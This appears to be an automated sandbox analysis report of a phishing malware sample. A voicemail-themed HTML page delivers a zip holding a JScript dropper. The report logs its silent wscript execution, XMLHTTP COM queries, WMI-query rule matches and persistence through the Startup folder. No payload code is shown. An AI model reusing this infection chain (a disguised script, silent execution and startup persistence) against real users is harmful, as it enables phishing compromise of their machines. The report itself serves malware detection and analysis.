Source: C:\Users\user\AppData\Local\Temp\2otik2vy.ast\New Voicemail May 9 _mp4.js, type: DROPPED	Matched rule: Detects JS potentially executing WMI queries Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\New Voicemail May 9 _mp4.js, type: DROPPED	Matched rule: Detects JS potentially executing WMI queries Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\New Voicemail May 9 _mp4.js, type: DROPPED	Matched rule: Detects JS potentially executing WMI queries Author: ditekSHen

Blob-based file download detected

Source: C:\Users\user\Downloads\New Voicemail May 9 _mp4.zip

File download: blob:null/a83fd8fe-018f-407d-9072-47af862d6eaf

Downloads suspicious files via Chrome

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File dump: C:\Users\user\Downloads\New Voicemail May 9 _mp4.zip (copy)

Jump to dropped file

Found suspicious ZIP file

Source: 90979717-e338-44bf-8273-e058c4be9529.tmp.0.dr

Zip Entry: New Voicemail May 9 _mp4.js

HTML document with suspicious name

Source: Name includes: Voicemail Jud.html

Initial sample: voicemail

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}			Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}			Jump to behavior

Wscript called in batch mode (surpress errors)

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\New Voicemail May 9 _mp4.js"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\New Voicemail May 9 _mp4.js"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\New Voicemail May 9 _mp4.js"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\New Voicemail May 9 _mp4.js"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\New Voicemail May 9 _mp4.js"	Jump to behavior

Source: 0000000C.00000003.2776254293.0000000006F11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
Source: 0000000C.00000003.2252696295.0000000006F11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
Source: 00000007.00000003.2039075098.0000000000E00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
Source: 0000000C.00000003.2365561540.0000000006F11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
Source: 0000000C.00000003.3283310659.0000000006F11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
Source: 0000000C.00000003.3228165832.0000000006F11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
Source: 0000000C.00000003.2122982130.0000000006CA9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
Source: 0000000B.00000003.2091678833.0000000006DB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
Source: 0000000C.00000003.2195388309.0000000006F11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
Source: 0000000C.00000002.3664293608.0000000006F10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
Source: 0000000C.00000003.3338153980.0000000006F11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
Source: 0000000B.00000003.2089734091.0000000006A73000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
Source: 0000000C.00000003.2309211314.0000000006F11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
Source: 0000000C.00000003.2479670966.0000000006F11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
Source: 0000000C.00000003.3408776876.0000000006F11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
Source: 00000011.00000003.2444105297.00000210130F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
Source: 0000000B.00000003.2047368224.0000000005204000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
Source: 0000000C.00000003.2092684570.00000000059AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
Source: Process Memory Space: 7za.exe PID: 2936, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
Source: Process Memory Space: wscript.exe PID: 7076, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
Source: Process Memory Space: wscript.exe PID: 1544, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
Source: Process Memory Space: wscript.exe PID: 6936, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
Source: C:\Users\user\AppData\Local\Temp\2otik2vy.ast\New Voicemail May 9 _mp4.js, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
Source: C:\Users\user\AppData\Local\Temp\New Voicemail May 9 _mp4.js, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
Source: C:\Users\user\AppData\Local\Temp\New Voicemail May 9 _mp4.js, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries

Source: classification engine

Classification label: mal100.phis.troj.expl.evad.winHTML@44/28@37/16

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\Downloads\90979717-e338-44bf-8273-e058c4be9529.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\unarchiver.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6096:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7092:120:WilError_03

Source: C:\Windows\SysWOW64\unarchiver.exe

File created: C:\Users\user\AppData\Local\Temp\unarchiver.log

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\unarchiver.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Voicemail Jud.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 --field-trial-handle=2292,i,17443918596644864279,4892845659542734896,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\SysWOW64\unarchiver.exe "C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\New Voicemail May 9 _mp4.zip"
Source: C:\Windows\SysWOW64\unarchiver.exe	Process created: C:\Windows\SysWOW64\7za.exe "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\2otik2vy.ast" "C:\Users\user\Downloads\New Voicemail May 9 _mp4.zip"
Source: C:\Windows\SysWOW64\7za.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\unarchiver.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2otik2vy.ast\New Voicemail May 9 _mp4.js"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\2otik2vy.ast\New Voicemail May 9 _mp4.js"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\New Voicemail May 9 _mp4.js"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\New Voicemail May 9 _mp4.js"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\New Voicemail May 9 _mp4.js"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\New Voicemail May 9 _mp4.js"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\New Voicemail May 9 _mp4.js"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 --field-trial-handle=2292,i,17443918596644864279,4892845659542734896,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2otik2vy.ast\New Voicemail May 9 _mp4.js"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\SysWOW64\unarchiver.exe "C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\New Voicemail May 9 _mp4.zip"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process created: C:\Windows\SysWOW64\7za.exe "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\2otik2vy.ast" "C:\Users\user\Downloads\New Voicemail May 9 _mp4.zip"	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2otik2vy.ast\New Voicemail May 9 _mp4.js"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\2otik2vy.ast\New Voicemail May 9 _mp4.js"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\New Voicemail May 9 _mp4.js"	Jump to behavior

Source: C:\Windows\SysWOW64\unarchiver.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\7za.exe	Section loaded: 7z.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: winhttpcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msdart.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: winhttpcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msdart.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
